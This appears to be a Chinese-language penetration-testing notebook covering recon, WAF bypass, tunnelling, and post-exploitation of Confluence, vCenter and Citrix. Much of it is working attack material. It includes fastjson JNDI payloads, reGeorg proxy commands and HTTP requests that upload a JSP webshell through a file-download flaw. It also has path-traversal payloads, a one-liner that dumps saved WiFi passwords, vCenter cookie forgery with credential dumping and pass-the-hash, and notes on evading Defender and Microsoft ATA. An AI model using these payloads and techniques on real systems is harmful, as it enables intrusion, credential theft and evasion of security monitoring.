目录 List
- 🏴☠ 打点-隐藏资产探测-host碰撞
- 🏴☠ “登录框” 攻击面
- 🏴☠ 宝塔防火墙 Bypass
- 🏴☠ fastjson bypass 某WAF
- 🏴☠ 内网-代理(reGeorg+Proxifier+Win)
- 🏴☠ 内网-代理(reGeorg+proxychains+Linux))
- 🏴☠ 内网-代理(ssocks反向代理)
- 🏴☠ 打点-Druid未授权访问->RCE
- 🏴☠ 打点-任意文件下载->RCE
- 🏴☠ pocsuite3代理使用
- 🏴☠ 打点-子域名爆破-泛解析问题
- 🏴☠ “SQL注入” 攻击面
- 🏴☠ “文件删除” 攻击面
- 🏴☠ “Java SSRF” 攻击面
- 🏴☠ 黑盒-漏洞挖掘(弱口令->任意文件下载->RCE)
- 🏴☠ 打点-ThinkPHP 5.0.X(debug模式+空数组)
- 🏴☠ 内网-CMD获取RDP端口
- 🏴☠ 内网-规避杀软 Windows Defender
- 🏴☠ 打点-文件下载-mlocate.db
- 🏴☠ 内网-CMD获取WIFI密码
- 🏴☠ 内网-DMZ区突破
- 🏴☠ 内网-PowerShell命令历史记录
- 🏴☠ 内网-定位多网卡主机
- 🏴☠ 内网-主机”不出网”
- 🏴☠ 内网-跨域
- 🏴☠ 打点-Confluence RCE利用
- 🏴☠ 打点-文件下载-.net环境
- 🏴☠ 内网-vSphere & vCenter的后利用姿势
- 🏴☠ 钓鱼-邮箱探针
- 🏴☠ 内网-Citrix的后渗透思路
- 🏴☠ 打点-Confluence后利用思路
- 🏴☠ 基建-关于学习RFC规范的必要性
- 🏴☠ 基建-负载均衡场景下的渗透
- 🏴☠ 云安全-K8S场景下的渗透
- 🏴☠ 信息收集-FoFa获取闭源软件源码
- 🏴☠ 打点-文件写入->RCE 的路径
- 🏴☠ 内网-Microsoft ATA 规避
隐藏资产探测-host碰撞
step1: 搜集子域名
step2: 搜集IP (目标域名历史解析IP)
step3: 以IP+域名的形式进行碰撞
传送:
1 | https://github.com/fofapro/Hosts_scan |
参考:
1 | https://www.cnblogs.com/Rain99-/p/13756032.html |
复现:
环境搭建
实验环境
1 | 安装nginx |
实战环境(模拟)
- 反代
- 限制IP访问
文件nginx.conf配置如下
1 | http { |
复现效果
如下图所示
IP访问
域名访问
Windows
# 修改 hosts
notepad %windir%\system32\drivers\etc\hosts
# 添加以下绑定关系
10.10.10.12 nginx.lab.com
使用Burpsuite复现
“登录框” 攻击面
- 用户名枚举
- 空口令
- 弱口令
- 登录认证绕过
- 暴力破解
- 图形验证码绕过
- 短信验证码绕过(或爆破)
- 短信轰炸(重放)
- 邮箱轰炸(重放)
- 密码明文传输
- SQL注入(万能密码)
- 任意用户密码重置
- 目录遍历
- 敏感信息泄露
- 框架漏洞(shiro)
- XSS
- JS文件
宝塔防火墙 Bypass
- 传参方式 $_COOKIE
- 编码绕过流量检测
3重 base64 失败(似乎检测了关键字‘base64’)
3重 url编码 成功
贴两个🐎(侵删
)
demo1:
1 |
|
demo2:
1 |
|
fastjson bypass 某WAF
demo
1 | {{"@type":"java.net.URL","val":"http://.dnslog.cn"}:0 |
bypass
1 | {"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}} |
内网渗透-代理(reGeorg+Proxifier+Win)
1 | # reGeorg |
上传对应的tunnel文件,如图即可
然后attack-pc 执行
1 | python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 8888 |
proxifier配置代理如下
- 127.0.0.1:8888
- socks5
内网渗透-代理(reGeorg+proxychains+Linux)
1 | # reGeorg |
上传对应的tunnel文件,如图即可
然后attack-pc 执行
1 | python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 4561 |
proxychains配置如下:
- vim /etc/proxychains.conf
demo:
使用proxychains代理远程登录windows
1 | proxychains rdesktop -g 1440x900 172.17.17.7:3389 //-g后面代表要使用的分辨率 |
内网渗透-代理(ssocks反向代理)
1 | https://sourceforge.net/projects/ssocks/ |
参考:
https://apt404.github.io/2016/09/12/ssocks/
Druid未授权访问->RCE
- 目录扫描 /druid/index.html
- 信息泄露 Session & URI(后台)
- 伪造session进入后台,发现上传点
1 | POST /index HTTP/1.1 |
- 绕过前端js验证实现任意文件上传
任意文件下载->RCE
- 发现1处文件下载的地方
1 | GET /download?module=&method=Download&name=test.zip&filepath=doc/test.zip HTTP/1.1 |
- burp抓包,换为post请求发现可下载任意文件
1 | POST /download HTTP/1.1 |
- 读取日志文件判断class文件的位置
1 | POST /download HTTP/1.1 |
下载class文件分析审计,在/download路由下的servlet存在上传文件和更新文件的操作
- 首先上传一个空文件到web目录
1
2
3
4
5
6
7POST /download HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml
Accept-Encoding: gzip, deflate
module=&method=upload&txtFile_Name=x.jsp&home=/&filepath=../webapps/- 更新文件内容为webshell
1
2
3
4
5
6
7POST /download HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml
Accept-Encoding: gzip, deflate
module=&method=updateContent&home=/&filepath=../webapps/x.jsp&content=xxxxxx成功突破网络边界进入内网
pocsuite3代理食用
命令行:
1 | python cli.py -r pocs\rce.py -u http://127.0.0.1/ --verify --proxy socks5://1.2.3.4:5678 |
proxier:
子域名爆破-泛解析问题
0.泛解析
1 | 原理: |
1.OneForAll:
1 | 访问一个随机的并不存在的域,通过返回结果判断是否存在泛解析,若存在泛解析,程序会不断的循环产生随机域名向服务器查询,将每次查询到的IP和TTL记录下来,直到大部分的IP地址出现次数都大于两次,则IP黑名单的收集结束,在得到了IP黑名单以后,将自己的字典中的每一项和要指定查询的域名进行拼接爆破,然后根据IP黑名单进行过滤。 |
2.SubdomainBrute
1 | 超过10个域名指向同一IP,则此后发现的其他指向该IP的域名将被丢弃。 |
3.目前思路-TTL黑名单
1 | 在权威 DNS 中,泛解析记录的 TTL 肯定是相同的,如果子域名记录相同,但 TTL 不同,那这条记录可以说肯定不是泛解析记录。 |
SQL注入攻击面
- 万能密码
- 敏感信息
邮箱/电话等 -> 供社工钓鱼使用
- 凭证
session/密码等 -> 外网系统入口(OA/邮箱/VPN)
- RCE
- mssql xp_cmdshell
- mysql udf
- Webshell
- mysql
- mssql
- oracle
- SSRF
- mssql
- oracle
- 端口扫描
- oracle
- 凭据(NTLM Hash)
- Windows & UNC
文件删除攻击面
- 删除install.lock导致重装,进而RCE
- /sys/install.lock VAuditDemo
- 删除某些配置文件导致重装,进而RCE
- my.php 然之协同
- 删除权限校验文件,组合受限漏洞(文件上传/SQLi注入等),进而RCE
- /inc/auth.inc.php 通达OA
- 删除账号密码配置文件,导致账号密码重新配置,进而获得管理员权限
- /WEB-INF/resources/privilege.xml 帆软报表系统(FineReport)
Java SSRF攻击面
- 利用file协议任意文件读取
- 利用http协议端口/服务探测
- 利用http协议进行 ntlm relay
- 组合redis等内网服务从而rce(weblogic)
黑盒-漏洞挖掘(弱口令->任意文件下载->RCE)
- Tip:
fofa随缘,独立ip 1000+即可
step1
- 搜索产品的安装手册/用户手册(弱口令,影子账户等)
- 发现通用弱口令-admin/admin
step2
登录后台并测试功能点,burp抓取流量
发现参数:?xmlPath=
- 构造payload
1
2.action?xmlPath=../../conf/tomcat-users.xml
.action?xmlPath=../../webapps/examples/WEB-INF/web.xml经测试存在任意文件读取漏洞
step3
回溯burp的代理流量
cookie发现参数:rememberMe
尝试组合任意文件读取进行漏洞利用
- web.xml -> shiro.ini(失败)
- tomcat-users.xml -> 控制台利用思路(失败)
最后还是作为脚本小子的快乐:)
ThinkPHP 5.0.X(Debug模式+空数组)
- 若目标启用了 debug 模式,敏感功能点传递空数组可能会引起程序抛出异常泄露敏感信息 by xxxeyJ
1 | POST /index/login |
内网-CMD获取RDP端口
Terminal下执行
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber
响应
PortNumber REG_DWORD 0xd3d
进制转换得到
内网-规避杀软 Windows Defender
1 | Defensive Evasion |
打点-文件下载/信息收集 mlocate.db
mlocate.db是linux下的一个数据库文件,用于存放locate命令的索引,也就是相当于存放了所有文件的路径。
文件位置
/var/lib/mlocate/mlocate.db
与之对应的命令 — locate
在拿到目标权限后做信息收集还是蛮不错的
1 | locate web.xml |
内网-CMD获取WIFI密码
— by chengmo
1 | for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear |
内网-DMZ区突破
本质:找到能通向内网的主机
- 双网卡主机
- 历史登录IP:可能来自内网的运维
- 站库分离:数据库服务器很可能在内网
- VPN:信息收集
- 钓鱼:钓鱼上线的机子大概率是在办公网)
内网-PowerShell命令历史记录
— 类似Linux下的.bash_history
文件位置
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
利用思路
- 打点: 任意文件下载+Windows系统,可以尝试一下该路径,也许有新世界
- 内网: 信息收集
- 蓝队: 溯源取证时,毕竟CMD一直以来都被诟病,PowerShell改改颜值还是很能打的,但是也就悄悄地给蓝队留下了”证据”(:
内网-定位多网卡主机(OXID Resolver)
工具
条件
- 目标主机: 开放135端口
后续
- 考虑到平台兼容性,可以根据OXID-Find用其他语言重构一版自用。
内网-主机”不出网”
本地环境搭建中
内网-跨域
本地环境搭建中
打点-Confluence RCE利用
近期的1次实战
- Confluence RCE(CVE-2021-26084),写入webshell,获取服务器权限
- 找到数据库配置文件,获取数据库权限
- 前期信息收集发现WIKI、Jira等站点需要AD账号登录,猜测其数据库有LDAP信息
- 在cwd_directory_attribute表找到LDAP配置信息,拿到密码
- 通过该密码获取源码管理平台(Gitlab)的控制权
打点-文件下载-.net环境
0x01 前言
这是对学校某网站随机测试发现的,当时可下载web.config,由于不熟悉.net就没有后续了。
前段时间隔壁班的大佬提示说: 可以尝试下载源码审计一波👀
0x02 流程回顾
在xx通知页面发现一处文件下载的功能点
- /tp/DownLoadFile.aspx?filename=
于是开始猜其目录
1 | ?filename=DownLoadFile.aspx |
最后以
- ?filename=./../DownLoadFile.aspx
成功下载
0x03 利用思路
1.下载web.config,获取数据库配置以及部分网站架构
如图,可获取到数据库密码
2.遍历下载*.aspx,然后根据Inherits所引用文件的位置,构造路径下载*.dll,然后dnSpy反编译后审计即可
示例:文件下载漏洞
内网-vSphere & vCenter的后利用姿势
— 历史笔记整理
关于vcenter的利用主要是在已经获取服务器权限的情况下
(登录后台)
- 从 vCenter 备份中提取 IdP 证书并伪造管理员身份登录后台(实战案例)
- 工具地址
data.mdb位置:
Linux:
1
/storage/db/vmware-vmdir/data.mdb
Windows
1
C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
实测效果
然后访问https://10.10.10.1/ui,在 /ui 路径下替换上一步所获得的cookie即可
进入后台后
- 可通过vcenter的快照功能获取虚拟机的快照,然后通过内存取证的姿势dump凭证,pth;
- 也可传到本地,再恢复成虚拟机,然后通过PE,重命名CMD.EXE为OSK.exe覆盖原OSK.exe,此时开机打开屏幕键盘会弹出SYSTEM权限的命令行窗口,本地上线cs然后hashdump抓取凭证,pth即可。(by banliz1)
钓鱼-邮箱探针
1 | # by se7ensec.cn |
内网-Citrix的后渗透思路
1 | Citrix虚拟化应用常常与AD域绑定,如果被登录,将会对整个域安全造成非常重大的风险。 |
打点-Confluence后利用思路
- 修改数据库,实现用户登录
- 修改用户登录口令
- 修改Personal Access Tokens(by 3gstudent)
- 写文件
- Windows: Confluence默认权限为network service,具有写权限
- Linux: Confluence默认权限为confluence,没有写权限,可以尝试内存马
测试CVE-2021-26084:
- Windows Server 2016
- Atlassian Confluence 7.4.10
- Postgresql 12.8-1
- AntSword
目录:
- 数据库配置-confluence.cfg.xml
1 | # Windows默认安装 |
基建-关于学习RFC规范的必要性
1 | For better or worse, Requests for Comments (RFCs) are how we specify many protocols on the Internet. |
RFC规范实际使用场景示例:
- 从RFC规范看如何绕过waf上传表单 上篇
- 从RFC规范看如何绕过waf上传表单 下篇
- 利用 URN 绕过 URL 检查
- 利用 multipart boundary 绕过 WAF
- An Exploration of JSON Interoperability Vulnerabilities
- 阅读RFC文档的一些小tip
学习参考:
基建-负载均衡场景下的渗透
- Why?
相信能看到这些笔记的师傅可能都曾遇到过负载均衡场景下的渗透问题,比如你通过nday打下了一台weblogic,并上了webshell,当你对目标机子再次发起请求时,你会发现执行命令出错,也许会猜测是因为网络问》题;于是你再用exp打了一次,成功了,此时的ip可能发生了变化;失败了,漏洞不存在了?在这些问题的背后,很有可能就是
负载均衡
在作祟。再加上微服务架构和K8S的兴起,负载均衡的应用也越来越多,这是个不得不学习 & 解决的坑。
- What?
# 通俗理解:
一个超市的收营员高峰期只能服务10位顾客,当做活动时有20位顾客需要服务的话可能就会排长队,这样购物体验将会很差(就像客户抱怨系统/网站访问太慢)。最简单的办法就是再招个营业员,重新开通一个出口。负载均衡的核心就是“分摊压力”。
- How?
云安全-K8S场景下的渗透
- Kubernetes安全测试实践录
- Kubernetes(K8s)横向移动办法
- Kubernetes安全入门
- Kubernetes集群渗透测试
- K8s渗透测试之kube-apiserver利用
- K0OTKIT:HACK K8S IN A K8S WAY
- 华为云CTF cloud非预期解之k8s渗透实战
- 容器安全 & 容器渗透学习笔记
- 云原生安全|基于容器ATT&CK矩阵模拟攻防对抗的思考
- 学习K8S中常见的21种攻击方式
- 红蓝对抗中的云原生漏洞挖掘及利用实录
信息收集-FoFa获取闭源软件源码
其他测绘引擎同理
示例:
1 | body="web.config" && "oa" && "rar" && country="CN" |
效果: 某OA全家桶?
打点-文件写入->RCE 的路径
- Web
- Webshell
- 文件包含(php)
- 模板引擎(.vm、.ftl)
- 脚本文件(.groovy)
- Linux
- 计划任务 cron
- 开机启动程序 /etc/rc.local
- SSH公钥
- Windows
- 启动项
- MOF(windows 2003)
内网-Microsoft ATA 规避
没遇到过,遇到了也不一定知道自己遇到了,再一次被自己 Vegetable Cried !!!
- 0、What is Advanced Threat Analytics?
- 1、Week of Evading Microsoft ATA @Nikhil SamratAshok Mittal
- 2、Microsoft ATA Evasion (Over PTH, Golden Ticket)
- 3、[Evading Microsoft ATA for Active Directory Domination @Black Hat](